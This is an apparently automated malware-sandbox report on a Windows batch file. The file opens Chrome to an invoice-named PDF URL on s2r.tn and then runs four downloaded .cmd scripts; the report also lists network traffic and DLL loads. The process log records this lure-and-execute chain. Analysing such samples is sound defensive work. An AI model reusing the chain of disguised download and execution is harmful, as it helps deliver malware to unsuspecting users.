Source: https://s2r.tn/cgi/INVOICERVSHA.pdf |
HTTP Parser: No favicon |
Source: unknown |
HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49742 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49744 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.4:64816 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:64819 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64820 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64821 version: TLS 1.2 |
Source: global traffic |
TCP traffic: 192.168.2.4:64815 -> 162.159.36.2:53 |
Source: Joe Sandbox View |
IP Address: 70.38.21.234 70.38.21.234 |
Source: Joe Sandbox View |
IP Address: 239.255.255.250 239.255.255.250 |
Source: Joe Sandbox View |
JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.43.61.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 13.95.31.18 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: global traffic |
HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveAccept-Encoding: identitySec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
DNS traffic detected: DNS query: s2r.tn |
Source: global traffic |
DNS traffic detected: DNS query: www.google.com |
Source: global traffic |
DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa |
Source: global traffic |
DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: new.bat |
String found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64817 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64820 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64817 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64816 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64819 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64818 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64816 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64818 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64821 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64819 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64823 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64823 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64825 |
Source: unknown |
Network traffic detected: HTTP traffic on port 64825 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64820 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 64821 |
Source: unknown |
HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49742 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49744 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.4:64816 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:64819 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64820 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64821 version: TLS 1.2 |
Source: classification engine |
Classification label: clean2.winBAT@29/4@9/8 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd"" |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.shell.servicehostbuilder.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: ieframe.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mlang.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd"" |
Jump to behavior |